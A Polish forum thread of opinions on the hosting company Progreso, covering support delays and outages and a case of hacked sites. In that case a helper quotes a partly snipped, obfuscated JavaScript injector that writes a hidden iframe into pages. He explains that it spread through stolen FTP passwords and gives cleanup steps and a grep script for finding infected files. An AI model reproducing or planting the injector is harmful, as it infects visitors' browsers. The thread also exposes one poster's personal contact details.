Opinie progreso.pl

[regdos 1848]

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?

Na dokładnie tych samych wersjach joomla !

Inne dodatki zainstalowane, ktoś wyjątkowo lubi Twoją stronę atakować, inne prawa plików, faktyczna inny konfiguracja serwera (ale to i tak włam ma miejsce przez joomle a nie przez serwer i winna jest temu joomla)

 

Ponadto jak wspomniałem włamania dokonywane są także na strony html a nie tylko na strony cms-a.

Czy tym tokiem mam nie używać html ?

To normalne bo jeżeli te same prawa użytkownika odnoszą się do serwisu joomla jak i do innych katalogów to skrypt uruchomiony z prawami takimi jak joomla może sobie pobuszowaćć i pozmieniać pliki na innych serwisach.

[error_404 0]

Proszę o radę co z tym zrobić ?

 

Zmień jak najszybciej hosting na inną firmę.

 

Obojętne jaką. Byle nie progreso.

[Gość adamszendzielorz]

OK.

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?

Na dokładnie tych samych wersjach joomla !

 

Juz otrzymales na ten temat odpowiedz -> u nas masz register_globals ustawione na "On", co drastycznie zmniejsza bezpieczenstwo tego skryptu. Kwestia jednego wpisu w pliku php.ini. "Wlamy" nie maja nic wspolnego z bezpieczenstwem serwera - chodzi o dziurawa wersje Twojej Joomli. Niestety decydujac sie na uzywanie oprogramowania typu Open Source, trzeba przynajmniej raz na kilka dni sledzic aktualizacje, a najlepiej jezeli dany soft posiada - zapisac sie na grupe mailowa z informacjami o aktualizacjach.

 

Otwierajac zlodziejowi drzwi do domu na osciez, bedziesz winil producenta drzwi, jak Cie okradna ?

pozdr.

[Dariusz Cieślak 3]

Od kilku dni na serwerze progreso dokonywane są włamania i podmienianie stron index.php lub index.html tzn dopisywanie skryptu przekierowującego na stronę dvcd.info.

Zgłaszałem to do tzw. supportu i dowiedziałem się że to luki w cms joomla ( to rozumiem ) ale takie same włamania

dokonywane są na plikach html będących w innych katalogach powyżej joomla.

Ponadto na innych serwerach na których mam serwisy na joomla ( te same wersje ) włamania nie są dokonywane

( home.pl , nazwa.pl ) czyli chyba wina leży po stronie usługodawcy - tzn. jego zabezpieczeń lub raczej braku takowych.

Niech zgadnę: pojawia się mniej więcej taki wpis:

<script language="JavaScript">function rkfg(jflq){return

String.fromCharCode(jflq);}var

ohhe="060105102114097109101032115114099061039104116116

(few lines snipped)

2105803210410510010010111005903906206004710510211

4097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3)

{ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';

document.write(ifdm);</script>

Usunąłem tego wirusa niedawno u mojego klienta i zdiagnozowałem źródło jako wyciek haseł FTP. Wirus na maszynie webmastera przechwycił hasła do FTP i wysłał je na zewnętrzny serwer. Po jakimś czasie nastąpiło połączenie FTP spoza Europy w czasie którego:

 

• nastąpiło skanowanie konta w poszukiwaniu plików *.php *.html
  
• dla każdego znalezionego pliku: DOWNLOAD / UPLOAD widoczna w transfer.log serwera FTP
  

Sposób usunięcia wirusa:

 

1. Wywalić wirusy ze stacji roboczych
   
2. Zmiana haseł FTP dla wszystkich kont
   
3. Przeskanowanie konta w poszukiwaniu zainfekowanych plików
   

W moim przypadku skanowanie wygląd tak (skrypt CGI na serwerze):

 

#!/bin/sh

echo Content-type: text/plain

echo

(

find . -name \*.html -o -name \*.php | xargs grep ""

) 2>&1

am123, proponuję zajrzeć do logów serwera FTP - jeśli znajdziesz tam podejrzane sekwencje DOWNLOAD/UPLOAD łatanie Joomli i zwalanie na progreso niewiele pomoże. Daj znać o wynikach śledztwa (sam jestem ciekawy jaki mechanizm włamu zadziałał u ciebie).

[am123 0]

Dziękuję...

 

Wreszcie coś konstruktywnego.

 

Wykonałem część założeń z postu - czekam na efekty.

 

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

[regdos 1848]

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

A przeczytałeś ze zrozumieniem to co Ci Dariusz Cieślak napisał ?

 

Wyciek haseł jest po stronie komputerów klienckich !! Co nie ma nic wspólnego z Provaiderem i z cms-em.

[Dariusz Cieślak 3]

Na początek errata:

find . -name \*.html -o -name \*.php | xargs grep ""

Tu edytor wyciął mi fragment, powinno być: find . -name \*.html -o -name \*.php | xargs grep "<!-- ad -->"

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

Nie wiem jak jest u ciebie. Na serwerze nie miałem Joomli (tym bardziej niezałatanej) - u mnie podejrzewam wyciek z wirusa na stacji roboczej (keylogger lub wyłuskanie zapisaneych haseł do FTP). Tym bardziej, że wirus skopiował się także na inne serwery do których był dostęp z tego komputera.

 

Czy są jakieś wyniki z analizy logów FTP?

 

Więcej szczegółów na temat wirusa: tutaj.

[am123 0]

Efekty:

 

Okazało się ( zgodnie z w.w. sugestiami ) że wirus był w komputerze stacjonarnym ( moim ), wykradał hasła

do ftp, łączył się i na index-y php i html doklejał złośliwy kod.

 

Czyli wina nie leżała po stronie usługodawcy, jednak sposób w jaki się o tym dowiedziałem czyli tydzień walki

bez odpowiedzi lub chyba z jedną żebym był dokładny - że to wina dziurawych skryptów - przekonał mnie

że SUPPORT to najważniejsza rzecz po jakości usług - czasem nawet odwrotnie.

 

Tutaj w skali ocen 1-10 support mogę ocenić na 2-3. W sumie odpowiedzieli ale nie wniosło to kompletnie nic

w mój problem jako klienta - choć wina leżała jak się okazało po mojej stronie a dokładnie stronie na którą wszedłem

z zainfekowanym hackiem.

 

Tego hacka wykrywa tylko google chrom i blokuje stronę, inne przeglądarki czytają takie strony i psuja się bez problemów.

 

Gdyby ktoś miał podobne symptomy radzę: usunąć zapisane hasła w programach ftp, zmienić hasła, przeinstalować system i używać haseł z palca ;-)

[mr.suchy 0]

moze troche zrobie OF ale musze jak czytam ostatni post Pana @am123. Radze zainstalowac program antywirusowy, firewall. SUPPORT firmy Progreso nie ochroni Pana @am123 przed zlapaniem wirusa. Radze wszystkim, przed napisanie postu (negatywnego) na temat usulg jakiekolwiek firmy, zastanowic sie. Nie sluchaj w 100% odpowiedz uzytkownikow z forum joomla, wordpress pt. "To wina hostingu"...zastanowic sie. Podziwiam @adamszendzielorz za nerwy na wodzy.

 

Pozdrawiam

[Gość RuFiK]

Witam,

Ja tez mialem problem z wirusem ktory podmienial mi indexa

 

Lekarstwo

- zmiana hasla na glowne konto FTP

- zakupienie kasp IS 2009 i pelny skan systemu i mojego intranetu (w moim przypadku)

 

pzdr

[Gość adamszendzielorz]

Podziwiam @adamszendzielorz za nerwy na wodzy.

 

Obslugujac helpdesk przez te kilka lat przyzwyczailem sie, ze niektorzy wieszaja na nim psy tylko dlatego, ze jest akurat pod reka, a ktos ma zly dzien :-) Nerwy trzymam na boku - to robota jak kazda inna. Jest problem - trzeba go rozwiazac i to wszystko

 

Bzikofski: pusc zgloszenie w helpdesku, jestes na slabo obciazonej maszynie (obecnie juz nie mamy innych ;-) i wszystko powinno chulac szybko.

pozdr.

[g00rek 0]

Czytając pozytywne opinie w tym wątku i przeglądając jednocześnie opinie na tematy innych providerów zdecydowałem się na hosting w progreso. Chciałem jednakże spytać czy obciążenie kilkoma wp i eksperyentalną joomlą czy dwoma nie będzie problemem dla takiego konta (odwiedziny <200 uu dziennie). Druge pytanie o wersję MySQL 5.2.3 kiedy się pojawi.

 

Niestety już na starcie zniechęcenie infolinia - 2 minut oczekiwanua (poddałem się), na odpowiedź mailową czekam już prawie 24h

 

Z superhosta uciekam tylko ze względu na rzekome "przeciążenie serwera" (czym????), ale kurcze helpdesk przynajmniej odpowiada na maile w ciągu godziny

[Gość]

2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?...

[g00rek 0]

2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?...

 

Ech no to już nie wiem. Coś co kosztuje <400 pln miesięcznie, nie dławi go kilka wordpressów i joomli, ma dobry panel (instalatory, dodawanie domen, itp), ma dobry helpdesk i nie pada co chwilę, ma dobrą prędkość... A może ja marzę?

[Gość]

Jeśli Ci się chce, to machnij mi mejla milosz@epoczta.pl lub GG 901 974 - podpytam to i owo i podzielę się najnowszymi newsami gdzie warto się zahościć : )

[g00rek 0]

Dzięki, ale chyba się zdecydowałem. Nie będe mówił gdzie bo mi serwer zapchacie

[spokeros 0]

kolega error_404 najlepiej opisał aktualną sytuację w progreso

kiedyś było nieźle, żeby nie powiedzieć bardzo dobrze albo nawet super

ale to było kiedyś

aktualnie hosting w progreso zszedł na psy

ja osobiście za najgorszą rzecz uważam zamulone serwery i całkowity brak supportu

mam konto w progreso trzeci rok, ale już więcej nie przedłuże, zastanawiam się nawet czy teraz nie zerwać umowy

beobsługowy hosting można mieć za darmo

za pieniądze można już czegoś wymagać - dysproporcja pomiędzy ceną a jakością obsługi w progreso jest aktualnie ogromna

można powiedzieć że jest cena a nie ma obsługi

ostatnio miałem mały problem, dzwoniłem chyba 4 razy, zapewniano mnie że owszem zaraz naprawią, ale mam zgłosić to przez helpdesk - zgłosiłem, ticket wisi już tydzień i nic, wielkie nic - czyli klasyka, jak już niejedna osoba pisała

szczerze odradzam zakup hostingu w tej firmie, można tylko naprężyć sobie nerwy i nic więcej

wg mnie wielkie nieporozumienie

Pan Szendzielorz pisze, że firmę prowadzi już 10 lat i "coś tam" już wie

drogi Panie "coś tam" to o wiele za mało by mówić o profesjonalizmie

poleciłem firmę wielu znajomym, teraz zarządzam odwrót...

[Gość RuFiK]

hmm jakies problemy z poczta via www ...

[Gość adamszendzielorz]

czyżby jakis padzik?

bo sie nie moge zaeftepować ani na strone wejsc..

 

edit: o juz funga

 

Padl nam glowny serwer DNS + extranetu + bazodanowy, z ktorego korzystaja praktycznie wszystkie maszyny "wewnetrznie", po LANie -> szkoda, bo szlismy z nim na rekord uptime'u, ktory wynosil juz blisko 500 dni :-) Przez to nie dzialal do konca wlasnie webmail, FTP, extranet no i nasza strona glowna. Problem zostal szybko rozwiazany.

pozdr.

[Hogollo 0]

Co się dzieje z rejestracją na Progreso?!?!

Od trzech dni chcę zarejestrować serser Biznes Plus i za każdym razem na samym końcu ostatniej strony rejestracji dostaje komunikat.:

"Błąd komunikacji..." i coś tam.

Zgłosiłem do helpdeska dokładny opis problemu i nic, dzwonie i dzwonie i tez nikt nie odbiera. Klient się niecierpliwi....

[Gość]

Chyba logiczne jest co zrobić w takim wypadku ; )))P

[Linux 0]

Zmienić firmę ? .

[Hogollo 0]

Panowie nie o to chodzi. W normalnym przypadku zapewne bym tak zrobił ale mam nietypową sytuację. Sam już jestem klientem Progreso i patrząc na niektóre wpisy (o dziwo) nie mogę na nich narzekać. Naprawdę. Sytuacja jest taka, że mam klienta i postawiłem mu pewien serwis, który np. na home.pl się sypał (z całym szacunkiem dla home.pl). Zainstalowałem wszystko u siebie na koncie (czyli na Progreso), pomodyfikowałem itd. i wiem, że chodzi bez bólu. Ale nie chcę klienta serwisu trzymać u siebie. Więc klient chciał sobie założyć serwer na Progreso no i kaszanka... nawet mi trochę głupio przed klientem bo wcześniej nie miałem problemów z supportem

Może przeczyta to ktoś z Progreso.

[Gość RuFiK]

Napisz do Adama na meila to migiem problem zostanie rozwiazany

 

pzdr.

[Gość]

A ja bym brał od nich manatki.. "za karę".. za duża konkurencja jest na rynku, żeby takie jaja robić.. żeby konta nie można było zamówić?

phhhhhhhhhhh....